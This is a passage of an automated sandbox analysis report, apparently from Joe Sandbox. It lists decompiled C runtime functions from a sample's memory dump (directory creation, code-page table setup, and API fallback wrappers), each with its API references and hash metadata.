Instruction ID: c44a0c197c59bd5580c19d8fe29ccc6f4950cccff58cfb03abbd368753900151
Opcode Fuzzy Hash: 69cf8e81a0997e03855f3b3726ba23fa417a739124453e6b773ac365649f8b64
Instruction Fuzzy Hash: D6318F31208305EFDB14CF24D958B6E77E9FB84B15F044959F981A7290CB79AD48CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B6A2B2 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B6A2B2(void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
				short _v4100;
				signed int _t11;
				void* _t14;
				void* _t17;
				int _t24;
				long _t25;
				WCHAR* _t26;
				void* _t27;

				_t27 = __eflags;
				E00B7EC50(0x1000);
				_t26 = _a4;
				_t11 =  *(E00B6C27E(_t27, _t26)) & 0x0000ffff;
				if(_t11 != 0x2e && _t11 != 0x20) {
					_t24 = CreateDirectoryW(_t26, 0); // executed
					if(_t24 != 0) {
						L6:
						if(_a8 != 0) {
							E00B6A4ED(_t26, _a12);
						}
						return 0;
					}
				}
				if(E00B6A231(_t26) == 0 && E00B6BB03(_t26,  &_v4100, 0x800) != 0 && CreateDirectoryW( &_v4100, 0) != 0) {
					goto L6;
				}
				_t25 = GetLastError();
				_t14 = 2;
				__eflags = _t25 - _t14;
				if(_t25 != _t14) {
					__eflags = _t25 - 3;
					_t17 = (0 | _t25 == 0x00000003) + 1;
					__eflags = _t17;
					return _t17;
				}
				return _t14;
			}

0x00b6a2b2
0x00b6a2ba
0x00b6a2c0
0x00b6a2c9
0x00b6a2cf
0x00b6a2d9
0x00b6a2e1
0x00b6a316
0x00b6a31a
0x00b6a320
0x00b6a320
0x00000000
0x00b6a325
0x00b6a2e1
0x00b6a2eb
0x00000000
0x00000000
0x00b6a32f
0x00b6a333
0x00b6a334
0x00b6a336
0x00b6a33a
0x00b6a340
0x00b6a340
0x00000000
0x00b6a340
0x00b6a343

APIs

Part of subcall function 00B6C27E: _wcslen.LIBCMT ref: 00B6C284

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00B6A175,?,00000001,00000000,?,?), ref: 00B6A2D9
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00B6A175,?,00000001,00000000,?,?), ref: 00B6A30C
GetLastError.KERNEL32(?,?,?,?,00B6A175,?,00000001,00000000,?,?), ref: 00B6A329

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: b5789591ca33572c7d7ea7dcea0efb088995aa9e99a10e865b8d41e2fb3b2771
Instruction ID: c12f07b34b1a8f2c5837afb46b76e6125275ded921933fb74264d9c704d37ae7
Opcode Fuzzy Hash: b5789591ca33572c7d7ea7dcea0efb088995aa9e99a10e865b8d41e2fb3b2771
Instruction Fuzzy Hash: 29019E352002106AEF21AAB54C59BED76D8EF0A780F044495F901F6291DB6CCA818ABA

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00B8B893(void* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				intOrPtr _v1824;
				signed char _v1828;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t63;
				void* _t67;
				signed char _t68;
				intOrPtr _t69;
				void* _t72;
				char _t73;
				char _t74;
				signed char _t75;
				signed int _t76;
				signed char _t87;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				char* _t94;
				intOrPtr _t96;
				signed int _t97;

				_t63 =  *0xb9e7ac; // 0x37e7c6f
				_v8 = _t63 ^ _t97;
				_t96 = _a4;
				_t4 = _t96 + 4; // 0x5efc4d8b
				if(GetCPInfo( *_t4,  &_v1820) == 0) {
					_t47 = _t96 + 0x119; // 0xb8bee6
					_t93 = _t47;
					_t87 = 0;
					_t67 = 0xffffff9f;
					_t68 = _t67 - _t93;
					__eflags = _t68;
					_v1828 = _t68;
					do {
						_t94 = _t93 + _t87;
						_t69 = _t68 + _t94;
						_v1824 = _t69;
						__eflags = _t69 + 0x20 - 0x19;
						if(_t69 + 0x20 > 0x19) {
							__eflags = _v1824 - 0x19;
							if(_v1824 > 0x19) {
								 *_t94 = 0;
							} else {
								_t72 = _t96 + _t87;
								_t57 = _t72 + 0x19;
								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
								__eflags =  *_t57;
								_t59 = _t87 - 0x20; // -32
								_t73 = _t59;
								goto L24;
							}
						} else {
							 *(_t96 + _t87 + 0x19) =  *(_t96 + _t87 + 0x19) | 0x00000010;
							_t54 = _t87 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t94 = _t73;
						}
						_t68 = _v1828;
						_t61 = _t96 + 0x119; // 0xb8bee6
						_t93 = _t61;
						_t87 = _t87 + 1;
						__eflags = _t87 - 0x100;
					} while (_t87 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t97 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t90 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t103 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t93 =  *(_t90 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t93;
							if(_t76 > _t93) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t97 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t90 = _t90 + 2;
						__eflags = _t90;
						_t75 =  *_t90;
					}
					_t13 = _t96 + 4; // 0x5efc4d8b
					E00B8C988(_t93, _t103, 0, 1,  &_v264, 0x100,  &_v1800,  *_t13, 0);
					_t16 = _t96 + 4; // 0x5efc4d8b
					_t19 = _t96 + 0x21c; // 0xdb855708
					E00B8AB78(0, _t103, 0,  *_t19, 0x100,  &_v264, 0x100,  &_v520, 0x100,  *_t16, 0); // executed
					_t21 = _t96 + 4; // 0x5efc4d8b
					_t23 = _t96 + 0x21c; // 0xdb855708
					E00B8AB78(0, _t103, 0,  *_t23, 0x200,  &_v264, 0x100,  &_v776, 0x100,  *_t21, 0);
					_t91 = 0;
					do {
						_t68 =  *(_t97 + _t91 * 2 - 0x704) & 0x0000ffff;
						if((_t68 & 0x00000001) == 0) {
							__eflags = _t68 & 0x00000002;
							if((_t68 & 0x00000002) == 0) {
								 *(_t96 + _t91 + 0x119) = 0;
							} else {
								_t37 = _t96 + _t91 + 0x19;
								 *_t37 =  *(_t96 + _t91 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t68 =  *((intOrPtr*)(_t97 + _t91 - 0x304));
								goto L15;
							}
						} else {
							 *(_t96 + _t91 + 0x19) =  *(_t96 + _t91 + 0x19) | 0x00000010;
							_t68 =  *((intOrPtr*)(_t97 + _t91 - 0x204));
							L15:
							 *(_t96 + _t91 + 0x119) = _t68;
						}
						_t91 = _t91 + 1;
					} while (_t91 < 0x100);
				}
				return E00B7FBBC(_t68, 0, _v8 ^ _t97, _t93, 0x100, _t96);
			}

0x00b8b89e
0x00b8b8a5
0x00b8b8aa
0x00b8b8b5
0x00b8b8c7
0x00b8b9bf
0x00b8b9bf
0x00b8b9c5
0x00b8b9c7
0x00b8b9c8
0x00b8b9c8
0x00b8b9ca
0x00b8b9d0
0x00b8b9d0
0x00b8b9d2
0x00b8b9d4
0x00b8b9dd
0x00b8b9e0
0x00b8b9ec
0x00b8b9f3
0x00b8ba03
0x00b8b9f5
0x00b8b9f5
0x00b8b9f8
0x00b8b9f8
0x00b8b9f8
0x00b8b9fc
0x00b8b9fc
0x00000000
0x00b8b9fc
0x00b8b9e2
0x00b8b9e2
0x00b8b9e7
0x00b8b9e7
0x00b8b9ff
0x00b8b9ff
0x00b8b9ff
0x00b8ba05
0x00b8ba0b
0x00b8ba0b
0x00b8ba11
0x00b8ba12
0x00b8ba12
0x00b8b8cd
0x00b8b8cd
0x00b8b8cf
0x00b8b8cf
0x00b8b8d6
0x00b8b8d7
0x00b8b8db
0x00b8b8e1
0x00b8b8e7
0x00b8b90f
0x00b8b90f
0x00b8b911
0x00000000
0x00000000
0x00b8b8f0
0x00b8b8f4
0x00b8b906
0x00b8b906
0x00b8b908
0x00000000
0x00000000
0x00b8b8f9
0x00b8b8fb
0x00b8b8fd
0x00b8b905
0x00b8b905
0x00000000
0x00b8b905
0x00000000
0x00b8b8fb
0x00b8b90a
0x00b8b90a
0x00b8b90d
0x00b8b90d
0x00b8b914
0x00b8b929
0x00b8b92f
0x00b8b943
0x00b8b94a
0x00b8b959
0x00b8b96b
0x00b8b972
0x00b8b97a
0x00b8b97c
0x00b8b97c
0x00b8b986
0x00b8b996
0x00b8b998
0x00b8b9af
0x00b8b99a
0x00b8b99a
0x00b8b99a
0x00b8b99a
0x00b8b99f
0x00000000
0x00b8b99f
0x00b8b988
0x00b8b988
0x00b8b98d
0x00b8b9a6
0x00b8b9a6
0x00b8b9a6
0x00b8b9b6
0x00b8b9b7
0x00b8b9bb
0x00b8ba26

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00B8B8B8

Strings

, xrefs: 00B8B8FD

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: ea767930909bf1cab43dba37ed3e1d4dd2b42176839d2a0006afcda5079dbca9
Instruction ID: b63ddd2e9b0b830bbfefc2731ba1ae142d636fab64fde92a6bb145b710f3a8cc
Opcode Fuzzy Hash: ea767930909bf1cab43dba37ed3e1d4dd2b42176839d2a0006afcda5079dbca9
Instruction Fuzzy Hash: AD41F57050429C9ADF229E788C84FF6BBEDEB45304F1404EDE69A87152D735AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B8AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 35%

			E00B8AF6C(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				void* __esi;
				signed int _t18;
				intOrPtr* _t20;
				int _t22;
				void* _t30;
				intOrPtr* _t33;
				void* _t34;
				signed int _t35;

				_t31 = __edi;
				_t26 = __ecx;
				_t25 = __ebx;
				_push(__ecx);
				_t18 =  *0xb9e7ac; // 0x37e7c6f
				_v8 = _t18 ^ _t35;
				_t20 = E00B8AC98(0x16, "LCMapStringEx", 0xb979c4, "LCMapStringEx"); // executed
				_t33 = _t20;
				if(_t33 == 0) {
					_t22 = LCMapStringW(E00B8AFF4(__ebx, _t26, _t30, __edi, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0xb93278(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					_t22 =  *_t33();
				}
				_pop(_t34);
				return E00B7FBBC(_t22, _t25, _v8 ^ _t35, _t30, _t31, _t34);
			}

0x00b8af6c
0x00b8af6c
0x00b8af6c
0x00b8af71
0x00b8af72
0x00b8af79
0x00b8af8e
0x00b8af93
0x00b8af9a
0x00b8afdd
0x00b8af9c
0x00b8afb9
0x00b8afbf
0x00b8afbf
0x00b8afe8
0x00b8aff1

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 00B8AFDD

Strings

LCMapStringEx, xrefs: 00B8AF7D, 00B8AF87

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: b49044e2d1d7536e69ecacfa9610f5aca96f7b0f951e7e565e3a999698411dd1
Instruction ID: 3fc692be52a585f5666b75ad8a53d051cc2a07f870767a4ea645d3248ea186e8
Opcode Fuzzy Hash: b49044e2d1d7536e69ecacfa9610f5aca96f7b0f951e7e565e3a999698411dd1
Instruction Fuzzy Hash: D0010832544219BBDF02AF90DD06DEE7FE6EF08750F054196FE1866170CA368A31EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00B8AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E00B8AF0A(void* __ebx, void* __ecx, void* __edi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				void* __esi;
				signed int _t8;
				intOrPtr* _t10;
				int _t11;
				void* _t14;
				void* _t19;
				void* _t20;
				intOrPtr* _t22;
				void* _t23;
				signed int _t24;

				_t20 = __edi;
				_t14 = __ebx;
				_push(__ecx);
				_t8 =  *0xb9e7ac; // 0x37e7c6f
				_v8 = _t8 ^ _t24;
				_t10 = E00B8AC98(0x14, "InitializeCriticalSectionEx", 0xb979a0, "InitializeCriticalSectionEx"); // executed
				_t22 = _t10;
				if(_t22 == 0) {
					_t11 = InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0xb93278(_a4, _a8, _a12);
					_t11 =  *_t22();
				}
				_pop(_t23);
				return E00B7FBBC(_t11, _t14, _v8 ^ _t24, _t19, _t20, _t23);
			}

0x00b8af0a
0x00b8af0a
0x00b8af0f
0x00b8af10
0x00b8af17
0x00b8af2c
0x00b8af31
0x00b8af38
0x00b8af55
0x00b8af3a
0x00b8af45
0x00b8af4b
0x00b8af4b
0x00b8af60
0x00b8af69

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00B8A56F), ref: 00B8AF55

Strings

InitializeCriticalSectionEx, xrefs: 00B8AF1B, 00B8AF25

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 8999ba66583b82275853142ae1382860da8ffd84bc6278778c674ea2171e9e09
Instruction ID: ec6c0f7f4c097e60a5fe336877af2cfe8a318ecb1774419e380c02ebc5c8a3c4
Opcode Fuzzy Hash: 8999ba66583b82275853142ae1382860da8ffd84bc6278778c674ea2171e9e09
Instruction Fuzzy Hash: F2F0B431685218BBCF056F51CD02CAE7FE5EF04B11B4140A6FD1997270DE719E10DB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00B8ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E00B8ADAF(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* __esi;
				signed int _t4;
				intOrPtr* _t6;
				long _t7;
				void* _t10;
				void* _t15;
				void* _t16;
				intOrPtr* _t18;
				void* _t19;
				signed int _t20;

				_t16 = __edi;
				_t10 = __ebx;
				_push(__ecx);
				_t4 =  *0xb9e7ac; // 0x37e7c6f
				_v8 = _t4 ^ _t20;
				_t6 = E00B8AC98(3, "FlsAlloc", 0xb97938, "FlsAlloc"); // executed
				_t18 = _t6;
				if(_t18 == 0) {
					_t7 = TlsAlloc();
				} else {
					 *0xb93278(_a4);
					_t7 =  *_t18();
				}
				_pop(_t19);
				return E00B7FBBC(_t7, _t10, _v8 ^ _t20, _t15, _t16, _t19);
			}

0x00b8adaf
0x00b8adaf
0x00b8adb4
0x00b8adb5
0x00b8adbc
0x00b8add1
0x00b8add6
0x00b8addd
0x00b8adee
0x00b8addf
0x00b8ade4
0x00b8adea
0x00b8adea
0x00b8adf9
0x00b8ae02

APIs

TlsAlloc.KERNEL32 ref: 00B8ADEE

Strings

FlsAlloc, xrefs: 00B8ADC0, 00B8ADCA

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: df94eee79c5bc0a6ef1984dd7f6b78af9dbe33d3dec0f10f266f0163efba0084
Instruction ID: 9c906cd68c9ff613df88ba6adf23797b033a908514bab60babd1ad37044ef762
Opcode Fuzzy Hash: df94eee79c5bc0a6ef1984dd7f6b78af9dbe33d3dec0f10f266f0163efba0084
Instruction Fuzzy Hash: 96E0E5316852287BDA01AB65DD0297EBBD4DB44B21B1101FBF805A7270DD715E0087DA

Uniqueness

Uniqueness Score: -1.00%

Function 00B8BBF0 Relevance: 3.2, APIs: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00B8BBF0(void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __esi;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed int _t60;
				signed char _t62;
				signed int _t63;
				signed char* _t71;
				signed char* _t72;
				int _t75;
				signed int _t78;
				signed char* _t79;
				short* _t80;
				int _t84;
				signed char _t85;
				signed int _t86;
				signed int _t89;
				signed int _t90;
				int _t92;
				int _t93;
				intOrPtr _t95;
				signed int _t96;

				_t91 = __edi;
				_t48 =  *0xb9e7ac; // 0x37e7c6f
				_v8 = _t48 ^ _t96;
				_t95 = _a8;
				_t75 = E00B8B7BB(__eflags, _a4);
				if(_t75 != 0) {
					_push(__edi);
					_t92 = 0;
					__eflags = 0;
					_t78 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0xb9e978)) - _t75;
						if( *((intOrPtr*)(_t51 + 0xb9e978)) == _t75) {
							break;
						}
						_t78 = _t78 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t78;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t75 - 0xfde8;
							if(_t75 == 0xfde8) {
								L23:
								_t60 = _t51 | 0xffffffff;
							} else {
								__eflags = _t75 - 0xfde9;
								if(_t75 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t75 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t75,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0xbc26c4 - _t92; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E00B8B82E(_t95);
												goto L37;
											}
										} else {
											E00B7FFF0(_t92, _t95 + 0x18, _t92, 0x101);
											 *(_t95 + 4) = _t75;
											 *(_t95 + 0x21c) = _t92;
											_t75 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t95 + 8) = _t92;
											} else {
												__eflags = _v22;
												_t71 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t85 = _t71[1];
														__eflags = _t85;
														if(_t85 == 0) {
															goto L16;
														}
														_t89 = _t85 & 0x000000ff;
														_t86 =  *_t71 & 0x000000ff;
														while(1) {
															__eflags = _t86 - _t89;
															if(_t86 > _t89) {
																break;
															}
															 *(_t95 + _t86 + 0x19) =  *(_t95 + _t86 + 0x19) | 0x00000004;
															_t86 = _t86 + 1;
															__eflags = _t86;
														}
														_t71 =  &(_t71[2]);
														__eflags =  *_t71;
														if( *_t71 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t72 = _t95 + 0x1a;
												_t84 = 0xfe;
												do {
													 *_t72 =  *_t72 | 0x00000008;
													_t72 =  &(_t72[1]);
													_t84 = _t84 - 1;
													__eflags = _t84;
												} while (_t84 != 0);
												 *(_t95 + 0x21c) = E00B8B77D( *(_t95 + 4));
												 *(_t95 + 8) = _t75;
											}
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00B8B893(_t89, _t95); // executed
											L37:
											_t60 = 0;
											__eflags = 0;
										}
									}
								}
							}
						}
						_pop(_t91);
						goto L39;
					}
					E00B7FFF0(_t92, _t95 + 0x18, _t92, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0xb9e988;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t79 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t79[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t90 =  *_t79 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t90 - _t63;
									if(_t90 > _t63) {
										break;
									}
									__eflags = _t90 - 0x100;
									if(_t90 < 0x100) {
										_t31 = _t92 + 0xb9e970; // 0x8040201
										 *(_t95 + _t90 + 0x19) =  *(_t95 + _t90 + 0x19) |  *_t31;
										_t90 = _t90 + 1;
										__eflags = _t90;
										_t63 = _t79[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t79 =  &(_t79[2]);
								__eflags =  *_t79;
								if( *_t79 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t92 = _t92 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t95 + 4) = _t75;
					 *(_t95 + 8) = 1;
					 *(_t95 + 0x21c) = E00B8B77D(_t75);
					_t80 = _t95 + 0xc;
					_t89 = _v36 + 0xb9e97c;
					_t93 = 6;
					do {
						_t58 =  *_t89;
						_t89 = _t89 + 2;
						 *_t80 = _t58;
						_t80 = _t80 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L36;
				} else {
					E00B8B82E(_t95);
					_t60 = 0;
				}
				L39:
				return E00B7FBBC(_t60, _t75, _v8 ^ _t96, _t89, _t91, _t95);
			}

0x00b8bbf0
0x00b8bbf8
0x00b8bbff
0x00b8bc07
0x00b8bc0f
0x00b8bc14
0x00b8bc24
0x00b8bc25
0x00b8bc25
0x00b8bc27
0x00b8bc29
0x00b8bc2b
0x00b8bc2e
0x00b8bc2e
0x00b8bc34
0x00000000
0x00000000
0x00b8bc3a
0x00b8bc3b
0x00b8bc3e
0x00b8bc41
0x00b8bc46
0x00000000
0x00b8bc48
0x00b8bc48
0x00b8bc4e
0x00b8bd1c
0x00b8bd1c
0x00b8bc54
0x00b8bc54
0x00b8bc5a
0x00000000
0x00b8bc60
0x00b8bc64
0x00b8bc6a
0x00b8bc6c
0x00000000
0x00b8bc72
0x00b8bc77
0x00b8bc7d
0x00b8bc7f
0x00b8bd09
0x00b8bd0f
0x00000000
0x00b8bd11
0x00b8bd12
0x00000000
0x00b8bd12
0x00b8bc85
0x00b8bc8f
0x00b8bc94
0x00b8bc9c
0x00b8bca2
0x00b8bca3
0x00b8bca6
0x00b8bcf9
0x00b8bca8
0x00b8bca8
0x00b8bcac
0x00b8bcaf
0x00b8bcb1
0x00b8bcb1
0x00b8bcb4
0x00b8bcb6
0x00000000
0x00000000
0x00b8bcb8
0x00b8bcbb
0x00b8bcc6
0x00b8bcc6
0x00b8bcc8
0x00000000
0x00000000
0x00b8bcc0
0x00b8bcc5
0x00b8bcc5
0x00b8bcc5
0x00b8bcca
0x00b8bccd
0x00b8bcd0
0x00000000
0x00000000
0x00000000
0x00b8bcd0
0x00b8bcb1
0x00b8bcd2
0x00b8bcd2
0x00b8bcd5
0x00b8bcda
0x00b8bcda
0x00b8bcdd
0x00b8bcde
0x00b8bcde
0x00b8bcde
0x00b8bcee
0x00b8bcf4
0x00b8bcf4
0x00b8bd01
0x00b8bd02
0x00b8bd03
0x00b8bdc7
0x00b8bdc8
0x00b8bdcd
0x00b8bdce
0x00b8bdce
0x00b8bdce
0x00b8bc7f
0x00b8bc6c
0x00b8bc5a
0x00b8bc4e
0x00b8bdd0
0x00000000
0x00b8bdd0
0x00b8bd2e
0x00b8bd36
0x00b8bd36
0x00b8bd3a
0x00b8bd3d
0x00b8bd43
0x00b8bd46
0x00b8bd46
0x00b8bd49
0x00b8bd4b
0x00b8bd4d
0x00b8bd4d
0x00b8bd50
0x00b8bd52
0x00000000
0x00000000
0x00b8bd54
0x00b8bd57
0x00b8bd73
0x00b8bd73
0x00b8bd75
0x00000000
0x00000000
0x00b8bd5c
0x00b8bd62
0x00b8bd64
0x00b8bd6a
0x00b8bd6e
0x00b8bd6e
0x00b8bd6f
0x00000000
0x00b8bd6f
0x00000000
0x00b8bd62
0x00b8bd77
0x00b8bd7a
0x00b8bd7d
0x00000000
0x00000000
0x00000000
0x00b8bd7d
0x00b8bd7f
0x00b8bd7f
0x00b8bd82
0x00b8bd83
0x00b8bd86
0x00b8bd89
0x00b8bd89
0x00b8bd8f
0x00b8bd92
0x00b8bda1
0x00b8bdaa
0x00b8bdaf
0x00b8bdb5
0x00b8bdb6
0x00b8bdb6
0x00b8bdb9
0x00b8bdbc
0x00b8bdbf
0x00b8bdc2
0x00b8bdc2
0x00b8bdc2
0x00000000
0x00b8bc16
0x00b8bc17
0x00b8bc1d
0x00b8bc1d
0x00b8bdd1
0x00b8bde0

APIs

Part of subcall function 00B8B7BB: GetOEMCP.KERNEL32(00000000,?,?,00B8BA44,?), ref: 00B8B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00B8BA89,?,00000000), ref: 00B8BC64
GetCPInfo.KERNEL32(00000000,00B8BA89,?,?,?,00B8BA89,?,00000000), ref: 00B8BC77

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
